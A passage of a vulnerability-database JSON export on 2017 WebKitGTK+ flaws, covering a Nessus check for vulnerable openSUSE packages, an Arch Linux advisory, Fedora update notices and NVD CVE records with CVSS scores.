script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/13\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libwebkit2gtk3-lang-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", 
reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit-jsc-4-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit-jsc-4-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk3-debugsource-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk3-devel-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk3-plugin-process-gtk2-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", 
reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.18.0-5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "description": "Arch Linux Security Advisory ASA-201707-25\n==========================================\n\nSeverity: Critical\nDate : 2017-07-26\nCVE-ID : CVE-2017-7018 CVE-2017-7030 CVE-2017-7034 CVE-2017-7037\nCVE-2017-7039 CVE-2017-7046 CVE-2017-7048 CVE-2017-7055\nCVE-2017-7056 CVE-2017-7061 CVE-2017-7064\nPackage : webkit2gtk\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-362\n\nSummary\n=======\n\nThe package webkit2gtk before version 2.16.6-1 is vulnerable to\nmultiple issues including arbitrary code execution and information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 2.16.6-1.\n\n# pacman -Syu \"webkit2gtk>=2.16.6-1\"\n\nThe problems have been fixed upstream in version 2.16.6.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-7018 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7030 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7034 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7037 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7039 (arbitrary code 
execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7046 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7048 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7055 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7056 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7061 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7064 (information disclosure)\n\nAn information disclosure issue has been found in WebKitGTK+ <= 2.16.5,\nwhere an application may be able to read restricted memory.\n\nImpact\n======\n\nA remote attacker might be able to access sensitive information or\nexecute arbitrary code on the affected 
host.\n\nReferences\n==========\n\nhttps://webkitgtk.org/security/WSA-2017-0006.html\nhttps://security.archlinux.org/CVE-2017-7018\nhttps://security.archlinux.org/CVE-2017-7030\nhttps://security.archlinux.org/CVE-2017-7034\nhttps://security.archlinux.org/CVE-2017-7037\nhttps://security.archlinux.org/CVE-2017-7039\nhttps://security.archlinux.org/CVE-2017-7046\nhttps://security.archlinux.org/CVE-2017-7048\nhttps://security.archlinux.org/CVE-2017-7055\nhttps://security.archlinux.org/CVE-2017-7056\nhttps://security.archlinux.org/CVE-2017-7061\nhttps://security.archlinux.org/CVE-2017-7064", "modified": "2017-07-26T00:00:00", "published": "2017-07-26T00:00:00", "id": "ASA-201707-25", "href": "https://security.archlinux.org/ASA-201707-25", "type": "archlinux", "title": "[ASA-201707-25] webkit2gtk: multiple issues", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-08-07T20:18:27", "published": "2017-08-07T20:18:27", "id": "FEDORA:417B06017118", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: webkitgtk4-2.16.6-1.fc24", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. 
", "modified": "2017-07-31T00:22:09", "published": "2017-07-31T00:22:09", "id": "FEDORA:D681D609273A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: webkitgtk4-2.16.6-1.fc25", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-07-27T16:54:47", "published": "2017-07-27T16:54:47", "id": "FEDORA:33FB9639A184", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: webkitgtk4-2.16.6-1.fc26", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2538"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-07-25T19:48:43", "published": "2017-07-25T19:48:43", "id": "FEDORA:D7806602D551", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: webkitgtk4-2.16.5-1.fc24", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2538"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. 
", "modified": "2017-07-07T07:21:50", "published": "2017-07-07T07:21:50", "id": "FEDORA:48FE6603253B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: webkitgtk4-2.16.5-1.fc25", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2538"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-06-23T14:22:20", "published": "2017-06-23T14:22:20", "id": "FEDORA:0A5F9606D22A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: webkitgtk4-2.16.4-1.fc26", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7037", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7037"], "modified": "2019-03-22T19:25:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7037", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7037", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7034", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7034"], "modified": "2019-03-22T19:24:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7034", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7030", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7030"], "modified": "2019-03-22T19:24:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7030", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7030", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7018", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7018"], "modified": "2019-03-22T19:22:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7018", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7018", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7046", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7046"], "modified": "2019-03-22T19:27:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7046", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7046", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7048", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 